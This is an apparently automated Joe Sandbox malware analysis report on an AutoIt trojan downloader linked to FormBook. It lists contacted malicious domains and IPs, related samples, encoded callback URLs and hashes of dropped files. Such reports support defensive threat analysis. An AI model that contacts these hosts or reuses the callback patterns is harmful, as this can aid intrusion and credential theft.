                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/react.min.js?ver=18.2.0makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/shipping-info/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/is-shallow-equal.min.js?ver=20c2b06ecf04afb14feemakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_700.woffmakecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-components.jmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/blocks-checkout.js?makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/xmlrpc.phpmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/wp-includes/js/dist/vendor/wp-polyfill-importmap.min.js?ver=1.8.2makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/conditions-of-use/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/feed/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://yoast.com/wordpress/plugins/seo/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/libs/ie-flexibility.jsmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/uploads/2024/06/cropped-pngtree-ship-logo-cruise-or-ship-logrULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.itsjojosiwas.com/product-category/permatex/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-data.js?vmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://wordpress.org/plugins/woocommerce-conversion-tracking/)makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/element.min.js?ver=ed1c7604880e8b574b40makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/product-category/esf/rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/style.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmakecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?vermakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.onlandtoy.com/wp-includes/js/dist/interactivity.min.js?ver=6.5.2makecab.exe, 00000006.00000002.4101618826.0000000005A20000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003570000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/deprecated.min.js?ver=73ad3591e7bc95f4777amakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/vendor/lodash.min.js?ver=4.17.19makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212efmakecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://wpzipped.com/makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.itsjojosiwas.com/wp-includes/js/dist/primitives.min.js?ver=6984e6eb5d6157c4fe44makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          23.105.215.248
                          		nbq.ssywan.comCanada
                          		25820IT7NETCAfalse
                          43.157.128.107
                          		www.onlandtoy.comJapan4249LILLY-ASUSfalse
                          216.194.173.237
                          		mysticriverpath.comUnited States
                          		22611IMH-WESTUSfalse
                          203.161.41.205
                          		www.quiluxx.topMalaysia
                          		45899VNPT-AS-VNVNPTCorpVNfalse
                          104.21.89.46
                          		www.rtpdewata4d-16.xyzUnited States
                          		13335CLOUDFLARENETUStrue
                          3.33.130.190
                          		kundalisathi.comUnited States
                          		8987AMAZONEXPANSIONGBfalse
                          212.227.172.254
                          		www.focusonsocials.comGermany
                          		8560ONEANDONE-ASBrauerstrasse48DEfalse
                          64.46.102.70
                          		kera333.orgUnited States
                          		26163DATAGRAMUSfalse
                          103.176.91.154
                          		www.bb58cc.comunknown
                          		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                          3.33.244.179
                          		www.bestandpure.comUnited States
                          		8987AMAZONEXPANSIONGBfalse
                          172.67.196.1
                          		www.itsjojosiwas.comUnited States
                          		13335CLOUDFLARENETUSfalse

                          General Information

                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1474004
                          Start date and time:2024-07-16 07:20:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 26s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@7/5@16/11
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 91%
                          • Number of executed functions: 55
                          • Number of non-executed functions: 271
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:22:07API Interceptor12243151x Sleep call for process: makecab.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          23.105.215.248HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                          • www.3333711m14.shop/td6z/
                          43.157.128.107Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                          • www.onlandtoy.com/y145/
                          216.194.173.237SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exeGet hashmaliciousFormBookBrowse
                          • www.mysticriverpath.com/6vu8/
                          jlsvOH1c8bSRKqM.exeGet hashmaliciousFormBookBrowse
                          • www.mysticriverpath.com/0guv/
                          203.161.41.205New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                          • www.hellenstore.top/sfd2/
                          Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                          • www.tfcgreen.top/mcba/
                          adobe_scanner12.exeGet hashmaliciousFormBookBrowse
                          • www.shabygreen.top/4n8t/
                          7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                          • www.shabygreen.top/4n8t/
                          AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                          • www.devtech.life/rewk/
                          104.21.89.46Confirmation For-Certara.pdfGet hashmaliciousHTMLPhisherBrowse
                            3.33.130.190GSTP - K3E0035.exeGet hashmaliciousFormBookBrowse
                            • www.haberyazilimlari.xyz/gp7t/
                            vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                            • freegeoip.net/xml/
                            vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                            • freegeoip.net/xml/
                            New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • www.mscuration.com/txr6/
                            ORDEN_240715189833.IMGGet hashmaliciousDarkTortilla, FormBookBrowse
                            • www.shapenbuy.com/5xz5/
                            BL.exeGet hashmaliciousFormBookBrowse
                            • www.abc8web.com/sm5e/
                            OrderPI.exeGet hashmaliciousFormBookBrowse
                            • www.lextcommunities.com/qt3s/
                            docs_pdf.exeGet hashmaliciousFormBookBrowse
                            • www.789bet1okvip.solutions/aoam/?D0Pts04=Eo7hyHn30cp3PMowPDjUS1eso/Zba7hHHMc1+Dk3yrF+CAsKksIOHOuhtM05CC/e3HjWlDqziYa3lDzCuMJvVQxsVStEDyJQgF4EVzhIE64C3aguyc8vXyTVrLHS4c+iCk5yFwg=&Q8s=tdcd5h7ptjmdxx
                            payment advice.exeGet hashmaliciousFormBookBrowse
                            • www.abc8web.com/sm5e/
                            vNrcPvMYLZmn2cc.exeGet hashmaliciousFormBookBrowse
                            • www.zerolength.xyz/mc10/?yrCDSlw=+hw+aGSrqNJPXAKTI+d1f9+ihmayTPYKE17mK9H9odLh7YQ+aA2Ta0l7fr2FH5vYxut0&Jlt=Y4Ctjz3PDNY8yDR

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            www.bb58cc.comDHL Receipt_AWB#20240079104.exeGet hashmaliciousFormBookBrowse
                            • 43.240.144.35
                            FedEx Receipt_AWB# 102003550412.exeGet hashmaliciousFormBookBrowse
                            • 43.240.144.35
                            www.onlandtoy.comSecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exeGet hashmaliciousFormBookBrowse
                            • 43.157.128.107
                            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                            • 43.157.128.107
                            www.itsjojosiwas.comNew PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 172.67.196.1
                            www.focusonsocials.comSecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exeGet hashmaliciousFormBookBrowse
                            • 212.227.172.254
                            nbq.ssywan.comHSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                            • 23.105.215.248

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            LILLY-ASUShttp://dream-orbit.com/dreamorbit-selected-as-a-2012-red-herring-top-100-asia/%20dream-orbit.comGet hashmaliciousUnknownBrowse
                            • 43.202.168.202
                            SzEvaEcbe3.elfGet hashmaliciousUnknownBrowse
                            • 42.209.62.168
                            botx.arm6.elfGet hashmaliciousMiraiBrowse
                            • 43.118.22.94
                            botx.x86.elfGet hashmaliciousMiraiBrowse
                            • 42.136.249.226
                            185.208.158.215-x86-2024-07-14T08_54_06.elfGet hashmaliciousUnknownBrowse
                            • 40.26.85.166
                            185.208.158.215-mips-2024-07-14T08_54_05.elfGet hashmaliciousUnknownBrowse
                            • 43.132.240.94
                            mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
                            • 43.153.49.49
                            jew.arm.elfGet hashmaliciousUnknownBrowse
                            • 40.53.82.30
                            jew.arm7.elfGet hashmaliciousMiraiBrowse
                            • 42.139.82.6
                            jew.mpsl.elfGet hashmaliciousMiraiBrowse
                            • 40.210.7.201
                            IMH-WESTUShttps://bmryw2w4c4m3dw.inwise.net/Page_7-15-2024_1Get hashmaliciousPhisherBrowse
                            • 74.124.202.185
                            https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObjectGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 216.194.168.39
                            SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exeGet hashmaliciousFormBookBrowse
                            • 216.194.173.237
                            jlsvOH1c8bSRKqM.exeGet hashmaliciousFormBookBrowse
                            • 216.194.173.237
                            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                            • 216.194.161.167
                            DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                            • 216.194.161.167
                            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                            • 216.194.161.167
                            DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                            • 216.194.161.167
                            https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QNGet hashmaliciousHTMLPhisherBrowse
                            • 209.182.194.173
                            https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyjC4MVZ8WF44ySzBi6efN3zaqod3SxqQ1kDtzYoyQOsWWD19NsGcVNDBcFjl9mUT7fbfISshhTM2Hik02CHjq-9Q67vAot3BfkCz1fsPEPNCf7G7MVRriPpFBDyLvG5wWqHsR-cwOURIaxnerOQ99C00IkC5xo8SyVqmsRm4_h22BEVkgpwhIxN5ZLSZjkxsDiVXWEiomSy9VfeZMSpAZBIiVY5QOn61X75pVs8oUeoKLdPrvk2c30UYd3VO5mnFHavb6nEffGuo1D5oKxYWc0Cn_-p6tPW-P_jOehq5HKz3wTiXh0DEAmqouDGoQMnrEZrqh3uNO8i3DH8OUtiyY0qJrP4tokSeZMhLFcgcGL1rQtDYermPtRGb82rC_qMPluzB5vb8_joMO7PI6RQTXMQ==Get hashmaliciousHTMLPhisherBrowse
                            • 209.182.194.173
                            VNPT-AS-VNVNPTCorpVNstatment-document.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 203.161.62.199
                            5Jan3SztHt.elfGet hashmaliciousUnknownBrowse
                            • 14.236.4.16
                            z46SOLICITA____.exeGet hashmaliciousFormBookBrowse
                            • 203.161.49.220
                            rDU-Payment48R_.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            • 203.161.42.156
                            New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 203.161.41.205
                            botx.arm6.elfGet hashmaliciousMiraiBrowse
                            • 113.183.33.180
                            botx.x86.elfGet hashmaliciousMiraiBrowse
                            • 203.210.177.226
                            DHL_AWB#6078538091.exeGet hashmaliciousFormBookBrowse
                            • 203.161.55.124
                            185.208.158.215-x86-2024-07-14T08_54_06.elfGet hashmaliciousUnknownBrowse
                            • 14.186.26.175
                            mlk3kK6uLZ.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, VidarBrowse
                            • 113.161.210.60
                            IT7NETCA185.208.158.215-mips-2024-07-14T08_54_05.elfGet hashmaliciousUnknownBrowse
                            • 95.169.14.81
                            FcMd5XxxZ0.elfGet hashmaliciousMiraiBrowse
                            • 107.182.180.140
                            Document.exeGet hashmaliciousFormBookBrowse
                            • 95.169.27.235
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                            • 95.169.27.235
                            Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                            • 95.169.27.235
                            HSBC Bank_Approvel Letter.exeGet hashmaliciousFormBookBrowse
                            • 23.105.215.248
                            D2XjA30YmD.elfGet hashmaliciousMiraiBrowse
                            • 144.34.183.93
                            http://telegram-chinese.vn/Get hashmaliciousUnknownBrowse
                            • 178.157.60.45
                            06V2RO89xu.elfGet hashmaliciousMiraiBrowse
                            • 69.194.9.68
                            saq4WWKA5B.elfGet hashmaliciousMiraiBrowse
                            • 45.62.98.20

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\aut8C0D.tmp

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):272384
                            Entropy (8bit):7.994277033599217
                            Encrypted:true
                            SSDEEP:6144:RPzzfbYJ1oqkVcGXqCvcfWNNZt7YZFYx0P5hRK/0SjzU1Zg:NfY2cUvcfWN7t8xLkia
                            MD5:289BD1C11144081228E5152CAD6E9547
                            SHA1:10D1D938B69247EFC94294BD2BE860422D47E16D
                            SHA-256:E9AAA352BCDBE7B8805AC5F438409E241C5E7EC9AB34E479917880E4D06842EE
                            SHA-512:082B5D3C7A0F42BC18481E2C66EE97FBEFF28C3F7B3542F40E679FAFB5ED19CA94BE0D4E9F3DE242794566C76AF2B61B5900AA0DBF67C1EE89DBEC34CE38F601
                            Malicious:false
                            Reputation:low
                            Preview:yi...1URG...L...w.UN...|N]..GVE1URGKC4EJDGTK5UM1F2TMU443GV.1URIT.:E.M.u.4....Z=>uDF\ $$\u1&%-[1j&"t9@;mX(.....Y\#3k<XXcKC4EJDG-J<.pQ!.i-2..S ._...}+$._..h+R.W...h-2.fZ$>xQ2.GKC4EJDG..5U.0G2C<%l43GVE1UR.KA5NKOGT]1UM1F2TMU4D!GVE!URG{G4EJ.GT[5UM3F2RMU443GVC1URGKC4Ez@GTI5UM1F2VM..43WVE!URGKS4EZDGTK5U]1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4k>!? K5U.$B2T]U44%CVE!URGKC4EJDGTK5Um1FRTMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5UM1F2TMU443GVE1URGKC4EJDGTK5U

                            C:\Users\user\AppData\Local\Temp\aut8C4C.tmp

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9808
                            Entropy (8bit):7.61278628207434
                            Encrypted:false
                            SSDEEP:192:ZfyK5mQmlyEAZBZyZXeGPmoRO3oQUStrNZLHiJ:Ry4fIyVBYzFReHUStxZLq
                            MD5:61C33A61BFDE9FDB3268E17BB3D328A5
                            SHA1:6A8C4DF089C8A4B39670091A3BDF0A240409ECDC
                            SHA-256:79C69BB233F9A610DB59959B3DA5689A6226A975F90757A5206806686928BF99
                            SHA-512:5ED574DCF9468905589CE062EF50B900FDB0FB58D2061E1F155AC4A3446339BCCD0B7DDCBD46ECFD2106D9F441E35D2AAE9EC58E35140F707705C7BD79D1C5FD
                            Malicious:false
                            Reputation:low
                            Preview:EA06..p...f.i..d...K%.c3....i..qc...`...c7..gSY..kc.M...]....)...K........|. .o..c.M......9.M...:...S@...l.....3.Z..m:..6.P.o.n..Y......g.:.M&.@..Y....N.l.Y.........:.Mf....r.'3i...c ....Ab.H..... .F.3<..Y..6...,.b....`...x..l....Bt.....X..0.M.....p...Yf`5_..j....f.5_..r.U..l@5_....U..l.5_..b.U..`5\..>3 ..M.^.b.Z..m7.z..q7......@.....S...G../Z...@.....jt....p.u....$.p./.q9...g.G_T......,.>_.......zm6....y....S0...................`.M..`... ...d...@..0.'.5...{>K...c..sP..X..._..r......>K.#G.c..3|vI..G.5..&`8_..md..i|vI....d.h.,. ......%..8...[=....&.@;..9...@.L..6y..f..+ .ffV9...7..l....f. .E...Y....3.Y.............vY.....@.....2p....<d....,vd.........!+ .'&@....,fq3.Yl.9.......r.3.X...c3{,.gg.Y.!...Gf`....,f.:.Nl.. .#8.....c.@........r.h.s.....,vh......t.....40.....f.....fS....4..@.6.-..p..S.5..3...S@.N..;6.`..:..l....m9.....c.`..Y.S.wx.....vn......`.E.....@y6....p.c3.-..5..b.!....F ....B5d..'S........vp......f6K-.t...B3`...@.;9.X...b.....(........g ...L..{4..d...

                            C:\Users\user\AppData\Local\Temp\d10fE87

                            Download File
                            Process:C:\Windows\SysWOW64\makecab.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                            Category:dropped
